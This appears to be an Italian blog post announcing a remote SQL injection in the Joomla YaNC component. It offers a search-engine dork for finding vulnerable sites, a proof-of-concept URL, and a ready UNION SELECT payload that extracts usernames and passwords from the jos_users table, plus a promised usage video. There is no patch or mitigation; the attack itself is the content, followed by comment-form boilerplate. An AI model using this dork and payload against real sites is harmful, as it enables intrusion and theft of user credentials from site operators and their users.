SQL injection

ECCOVI UN NUOVO BUG

/—————————————————————\

\ /

/ Joomla Component YaNC Remote SQL injection \

\ /

\—————————————————————/

Dork : inurl:com_yanc listid

[*] POC : http://localhost/%5BJoomla_Path%5D/index.php?option=com_yanc&Itemid=179&listid={SQL}

[*] Example : http://localhost/%5BJoomla_Path%5D/index.php?option=com_yanc&Itemid=179&listid=-1 UNION SELECT concat(username,0x3a,password),@@version FROM jos_users–

HO REALIZATO UN VIDIO PER FAR CAPIRE L’UTILIZZO

DOWNLOAD_VIDEO

Una Risposta to “SQL injection”

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: